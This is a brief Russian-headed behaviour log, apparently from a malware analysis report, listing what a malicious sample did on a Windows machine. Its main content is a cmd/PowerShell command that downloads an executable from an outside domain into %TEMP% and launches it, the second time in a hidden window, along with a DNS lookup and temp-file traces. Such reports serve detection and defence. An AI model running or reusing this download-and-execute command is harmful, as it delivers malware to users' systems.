Техническая информация
- http://ofegegeheheh.info/index.php как %temp%\vstryal.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://ofegegeheheh.info/index.php','%TEMP%\vstryal.exe');Start-Process '%TEMP%\vstryal.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1344
- %TEMP%\1228788.cvr
- DNS ASK of####eheheh.info
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://ofegegeheheh.info/index.php','%TEMP%\vstryal.exe');Start-Process '%TEMP%\vstryal.exe';' (со скрытым окном)